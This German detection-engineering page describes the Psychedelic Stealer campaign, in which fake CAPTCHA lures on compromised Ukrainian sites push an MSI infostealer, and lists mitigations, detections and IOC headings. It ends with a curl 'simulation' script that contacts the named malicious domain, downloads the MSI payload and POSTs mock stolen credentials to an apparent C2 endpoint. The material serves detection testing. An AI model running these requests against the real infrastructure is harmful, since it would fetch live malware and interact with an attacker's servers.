Der Psychedelische Dieb: Wenn ein CAPTCHA zu einem Installer wird
Detection stack
- AIDR
- Alert
- ETL
- Query
Zusammenfassung
Arctic Wolf Labs verfolgt eine Kampagne, die gefälschte Cloudflare-CAPTCHA-Köder nutzt, die in kompromittierte ukrainische Geschäftswesites injiziert werden. Der ClickFix-ähnliche Angriff überzeugt Benutzer, ein MSI-Paket auszuführen, das Psychedelic Stealer installiert, einen Infostealer, der darauf ausgelegt ist, Browser-Anmeldedaten, Kontotoken und Kryptowährungs-Wallet-Daten zu sammeln. Die Malware unterstützt auch persistente Fernsteuerungstasks durch dedizierte C2-Infrastruktur.
Untersuchung
Die Untersuchung deckte injizierte iframes auf legitimen ukrainischen Webseiten auf, die Besucher in einen gefälschten Verifizierungsablauf umleiten. Analysten identifizierten auch ein Köder-Management-Panel, das mit Rublevka TDS gebrandet ist und die Befehlskonfigurationen steuert und die Besucher-Telemetrie aufzeichnet. Die technische Analyse der MSI-Nutzlast enthüllte eine verschlüsselte URL der nächsten Stufe sowie die Kernroutinen der Malware für Anmelde- und Datendiebstahl.
Abschwächung
Organisationen sollten die verdächtige Ausführung von Windows Installer (msiexec.exe) überwachen, die von Webbrowsern oder Kommandozeilenschnittstellen gestartet werden. Webfilter sollten bekannte bösartige Domains blockieren, während Verteidiger auch legitime Webressourcen auf unautorisierte iframe-Injektionen überwachen sollten. Die Stärkung der Endpunktschutzmaßnahmen bei der Erstellung geplanter Tasks kann das Beständigkeitsrisiko weiter verringern.
Reaktion
Wird Psychedelic Stealer-Aktivität festgestellt, sollten betroffene Endpunkte isoliert werden, um weitere Datenexfiltration oder laterale Bewegungen zu stoppen. Browser-Profile und lokalen Speicher auf kompromittierte Anmeldedaten, Authentifizierungstoken und Wallet-Daten überprüfen. Netzwerk-Telemetrie auf Kommunikation mit bekannter C2-Infrastruktur überprüfen und Systeme auf unautorisierte geplante Tasks oder verdächtige native Messaging-Hosts inspizieren.
Angriffsablauf
Erkennungen
Verdächtiger RunMRU-Eintrag mit LOLBin-Semantik (über registry_event)
Möglicher Remote-MSI-Datei-Installationsversuch (über cmdline)
Mögliche C2-Kommunikation über HTTP zu direkter IP mit ungewöhnlichem Port (über Proxy)
Verdächtiger Dateidownload direkte IP (über Proxy)
IOCs (HashSha256) zum Erkennen: The Psychedelic Stealer: Wenn ein CAPTCHA zu einem Installer wird
IOCs (SourceIP) zum Erkennen: The Psychedelic Stealer: Wenn ein CAPTCHA zu einem Installer wird
IOCs (DestinationIP) zum Erkennen: The Psychedelic Stealer: Wenn ein CAPTCHA zu einem Installer wird
Erkennung des Zugriffs auf die Psychedelic Stealer-Infrastruktur [Webserver]
Simulationsausführung
-
Angriffsnarrativ & Befehle: Der Angreifer beabsichtigt, ein Ziel über einen gefälschten CAPTCHA-Mechanismus zu infizieren. Die Simulation wird das Verhalten des Browsers des Opfers nachahmen: Zuerst zum Einstiegspunkt des Angreifers navigieren, um erste Kontrollen zu umgehen, dann die bösartige MSI-Nutzlast anfordern und schließlich eine C2-Verbindung über einen HTTP-POST zu dem Steuerungsskript des Angreifers initiieren. Diese Abfolge soll die genauen URI-Muster nachahmen, die in der Psychedelic Stealer-Infrastruktur identifiziert wurden.
-
Regressionstest-Skript: Das folgende Skript verwendet
curlum die drei verschiedenen Phasen der Erkennungslogik zu simulieren.#!/bin/bash # Simulationsskript für Zugang zur Psychedelic Stealer-Infrastruktur TARGET_DOMAIN="uasputnik.com" echo "[+] Start der Psychedelic Stealer Infrastruktur-Simulation..." # Phase 1: Besuchen der Einstiegsseite simulieren (Auswahl 1) echo "[*] GET-Anfrage zur Einstiegsseite simulieren..." curl -s -X GET "http://$TARGET_DOMAIN/sputnik.html" -o /dev/null # Phase 2: Herunterladen der bösartigen MSI simulieren (Auswahl 2) echo "[*] GET-Anfrage für Nutzlast simulieren..." curl -s -X GET "http://$TARGET_DOMAIN/elita.msi" -o /dev/null # Phase 3: C2-Kommunikation über POST simulieren (Auswahl 3) echo "[*] POST-Anfrage an C2-Endpunkt simulieren..." curl -s -X POST "http://$TARGET_DOMAIN/admin777111777.php" -d "data=stolen_credentials" -o /dev/null echo "[+] Simulation abgeschlossen. Überprüfen Sie SIEM auf Warnungen." -
Bereinigungskommandos:
# Da dies eine netzwerkbasierte Simulation ist, werden keine Dateien auf dem lokalen System erstellt # es sei denn, es wird ausdrücklich verlangt. Keine Bereinigung des lokalen Dateisystems erforderlich. echo "[+] Bereinigung abgeschlossen."